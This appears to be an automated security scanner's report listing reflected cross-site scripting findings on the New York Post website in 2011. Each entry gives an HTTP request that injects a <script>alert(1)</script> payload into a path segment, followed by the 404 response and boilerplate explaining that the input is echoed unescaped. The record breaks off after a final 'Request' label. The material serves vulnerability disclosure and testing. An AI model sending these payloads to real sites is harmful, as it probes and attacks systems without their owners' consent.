GET /r/SysConfig/WebPortal/nypost/scripts/jquery.jcarousel.nyp.js90378<script>alert(1)</script>c769dcef57d HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 717 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:45 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 67b87<script>alert(1)</script>9f7ce2b8387 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig67b87<script>alert(1)</script>9f7ce2b8387/WebPortal/nypost/scripts/jquery.liscroll.nyp.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 716 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:40 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 947e2<script>alert(1)</script>de57eb99844 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal947e2<script>alert(1)</script>de57eb99844/nypost/scripts/jquery.liscroll.nyp.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 716 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:41 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9f962<script>alert(1)</script>896d507b062 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost9f962<script>alert(1)</script>896d507b062/scripts/jquery.liscroll.nyp.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 716 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:43 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b8aa5<script>alert(1)</script>b07b82d5c97 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/scriptsb8aa5<script>alert(1)</script>b07b82d5c97/jquery.liscroll.nyp.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 716 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:45 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload dd22f<script>alert(1)</script>b0be67b88d2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/scripts/jquery.liscroll.nyp.jsdd22f<script>alert(1)</script>b0be67b88d2 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 716 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:47 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 56699<script>alert(1)</script>eba7fd80ed8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig56699<script>alert(1)</script>eba7fd80ed8/WebPortal/nypost/scripts/jquery1.3.1.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 708 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:36 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4e34f<script>alert(1)</script>638de93ca8d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal4e34f<script>alert(1)</script>638de93ca8d/nypost/scripts/jquery1.3.1.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 708 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:37 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c157d<script>alert(1)</script>00484740350 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypostc157d<script>alert(1)</script>00484740350/scripts/jquery1.3.1.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 708 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:39 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 111b7<script>alert(1)</script>5b1232e1b7a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/scripts111b7<script>alert(1)</script>5b1232e1b7a/jquery1.3.1.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 708 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:40 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8832a<script>alert(1)</script>69dd46c5aac was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/scripts/jquery1.3.1.js8832a<script>alert(1)</script>69dd46c5aac HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 708 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:42 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b0523<script>alert(1)</script>9dbf90f3a74 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfigb0523<script>alert(1)</script>9dbf90f3a74/WebPortal/nypost/unica/hbx_original.js?v=nim20100505 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 708 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:09:18 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d1a91<script>alert(1)</script>fa0f76d0e94 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortald1a91<script>alert(1)</script>fa0f76d0e94/nypost/unica/hbx_original.js?v=nim20100505 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 708 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:09:19 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b886e<script>alert(1)</script>e9ff3abda5f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal/nypostb886e<script>alert(1)</script>e9ff3abda5f/unica/hbx_original.js?v=nim20100505 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 708 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:09:20 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload dfda4<script>alert(1)</script>4f57c1cd8bb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal/nypost/unicadfda4<script>alert(1)</script>4f57c1cd8bb/hbx_original.js?v=nim20100505 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 708 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:09:28 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 88d86<script>alert(1)</script>b8815d7b643 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal/nypost/unica/hbx_original.js88d86<script>alert(1)</script>b8815d7b643?v=nim20100505 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 708 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:09:31 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 324e0<script>alert(1)</script>23633d1701b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig324e0<script>alert(1)</script>23633d1701b/WebPortal/nypost/unica/migration.js?v=nim20091109 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 705 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:09:02 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8413e<script>alert(1)</script>2aabc16e906 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal8413e<script>alert(1)</script>2aabc16e906/nypost/unica/migration.js?v=nim20091109 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 705 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:09:10 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 97c53<script>alert(1)</script>31188999689 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal/nypost97c53<script>alert(1)</script>31188999689/unica/migration.js?v=nim20091109 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 705 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:09:11 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload cf00a<script>alert(1)</script>dafc13c3e42 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal/nypost/unicacf00a<script>alert(1)</script>dafc13c3e42/migration.js?v=nim20091109 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 705 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:09:12 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b6ba1<script>alert(1)</script>e817f670b1b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal/nypost/unica/migration.jsb6ba1<script>alert(1)</script>e817f670b1b?v=nim20091109 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 705 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:09:19 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 31d9b<script>alert(1)</script>625f880e871 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig31d9b<script>alert(1)</script>625f880e871/WebPortal/nypost/unica/ntpagetag.js?v=nim20091109 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 705 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:09:13 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 93854<script>alert(1)</script>d0e44a05b43 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal93854<script>alert(1)</script>d0e44a05b43/nypost/unica/ntpagetag.js?v=nim20091109 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 705 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:09:15 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4025a<script>alert(1)</script>122cf0c612a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal/nypost4025a<script>alert(1)</script>122cf0c612a/unica/ntpagetag.js?v=nim20091109 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 705 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:09:22 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e06a0<script>alert(1)</script>5e15db0c555 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal/nypost/unicae06a0<script>alert(1)</script>5e15db0c555/ntpagetag.js?v=nim20091109 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 705 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:09:23 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 5506f<script>alert(1)</script>f1e1b21cf85 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal/nypost/unica/ntpagetag.js5506f<script>alert(1)</script>f1e1b21cf85?v=nim20091109 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 705 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:09:29 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 40bf1<script>alert(1)</script>416e286f79 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig40bf1<script>alert(1)</script>416e286f79/WebPortal/nypost/unica/unica.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 700 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:47 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1f927<script>alert(1)</script>97bf6f737c4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal1f927<script>alert(1)</script>97bf6f737c4/nypost/unica/unica.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 701 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:49 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 98788<script>alert(1)</script>7422ba7c034 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal/nypost98788<script>alert(1)</script>7422ba7c034/unica/unica.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 701 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:52 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 28d46<script>alert(1)</script>192079921c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw/SysConfig/WebPortal/nypost/unica28d46<script>alert(1)</script>192079921c/unica.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 700 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:54 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload cc4ee<script>alert(1)</script>350effa176c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
